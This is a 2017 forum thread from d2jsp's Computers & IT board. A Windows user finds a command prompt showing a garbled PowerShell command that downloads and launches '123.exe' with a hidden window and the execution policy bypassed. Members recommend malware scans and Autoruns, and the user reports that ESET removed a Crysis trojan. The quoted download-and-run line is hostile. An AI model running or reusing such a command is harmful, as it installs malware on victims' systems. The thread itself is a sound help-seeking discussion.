d2jsp
Log InRegister
d2jsp Forums > Off-Topic > Computers & IT > Possible Computer Virus?
12Next
Add Reply New Topic New Poll
Views: 347Replies: 12Track Topic
Member
Posts: 2,941
Joined: Jun 14 2010
Gold: 1,120.00
#1
Oct 10 2017 03:01pm
I was away from my computer for a couple hours. I came back to my desk, and found a command prompt open with the following:

Quote
C:\Users\User>%WINDIR%\System32\Winidden -Exec Bypass "IEX (New-Object SyP em.Net.W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('ht.exe/"); Start-Process \"$env:temp\123.exe\"
'C:\WINDOWS\System32\Winidden' is not recognized as an internal or external command, operable program or batch file.

C:\Users\User>\123.exe\"); Start-Process \"$env:temp\123.exe\"
'\123.exe\"); Start-Process \"$env:temp\123.exe\"' is not recognized as an internal or external command,
operable program or batch file.


I'm not entirely sure what to make of that message. For AV, I just use Windows Defender, as I'm not out there doing crazy stuff. It's up to date, but a full scan showed nothing. I also downloaded, updated, and ran full scans on Spybot and Malwarebytes. Both scans showed no threats found.

My computer is a very simple Windows 10 setup. I have POESkillTree, Path of Building, Discord, Steam, Pokerstars, and Chrome on the machine.

Does anyone have any thoughts and/or insight into what could be causing this?
Member
Posts: 104,175
Joined: Apr 25 2006
Gold: 10,655.00
#2
Oct 10 2017 06:43pm

nvm.

This post was edited by Ghot on Oct 10 2017 06:46pm
Member
Posts: 32,103
Joined: Dec 29 2009
Gold: 0.00
#3
Oct 10 2017 08:08pm
Sounds like malware of some sort. Run Malwarebytes
Member
Posts: 109,870
Joined: Feb 1 2006
Gold: 18,352.00
#4
Oct 10 2017 08:09pm
Quote (Surfpunk @ Oct 10 2017 09:08pm)
Sounds like malware of some sort. Run Malwarebytes


he did.

Run eset online scanner preferably in safe mode.
same goes for malware bytes if it wasn't in safe mode.

Member
Posts: 10,281
Joined: Jan 7 2015
Gold: Locked
Warn: 60%
#5
Oct 10 2017 08:21pm
spooky
Member
Posts: 20,973
Joined: Apr 19 2006
Gold: 84.10
#6
Oct 10 2017 10:02pm
Quote (DCSS @ Oct 10 2017 09:21pm)
spooky


Exactly 123.exe

Member
Posts: 104,175
Joined: Apr 25 2006
Gold: 10,655.00
#7
Oct 10 2017 10:05pm
Member
Posts: 10,281
Joined: Jan 7 2015
Gold: Locked
Warn: 60%
#8
Oct 10 2017 10:38pm
gah i had tdss rootkit on windows xp way back in the day and it was the most annoying shit
killed it with combofix
Member
Posts: 32,103
Joined: Dec 29 2009
Gold: 0.00
#9
Oct 11 2017 10:37am
Quote (King Atrhur @ Oct 10 2017 09:09pm)
he did.

Run eset online scanner preferably in safe mode.
same goes for malware bytes if it wasn't in safe mode.


D'oh. :blush:

Grab Autoruns from Sysinternals (Microsoft). Run that, see if it finds a launch trigger for that 123.exe bit, and delete the entry. See if that makes it go away.
Member
Posts: 2,941
Joined: Jun 14 2010
Gold: 1,120.00
#10
Oct 11 2017 09:18pm
Quote (King Atrhur @ Oct 10 2017 08:09pm)
he did.

Run eset online scanner preferably in safe mode.
same goes for malware bytes if it wasn't in safe mode.


Hopefully that did it. Of everything mentioned here, ESET Online is the only thing that found anything. It found two entries of the Crysis Trojan, which it was able to clean, so hopefully that's that. Thanks for your help guys.
Go Back To Computers & IT Topic List
12Next
Add Reply New Topic New Poll

© 2003-2024 d2jsp  Contact